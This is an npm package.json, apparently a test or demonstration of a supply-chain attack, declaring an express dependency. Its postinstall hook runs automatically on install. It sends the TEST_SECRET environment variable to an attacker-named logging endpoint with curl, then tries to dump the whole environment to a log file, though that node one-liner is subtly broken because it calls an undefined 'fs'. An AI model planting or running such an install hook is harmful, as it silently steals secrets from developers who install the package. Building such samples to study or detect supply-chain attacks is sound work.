{
  "name": "dangerous-npm-repository-test",
  "version": "1.0.0",
  "description": "",
  "main": "index.js",
  "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1",
    "postinstall": "curl \"http://attacker-logging-endpoint.sasakiy84.net/aaa/${TEST_SECRET}\" && node -e \"var f = require('fs');fs.writeFileSync('a.log', JSON.stringify(process.env));\""
  },
  "author": "",
  "license": "ISC",
  "dependencies": {
    "express": "^4.18.2"
  }
}
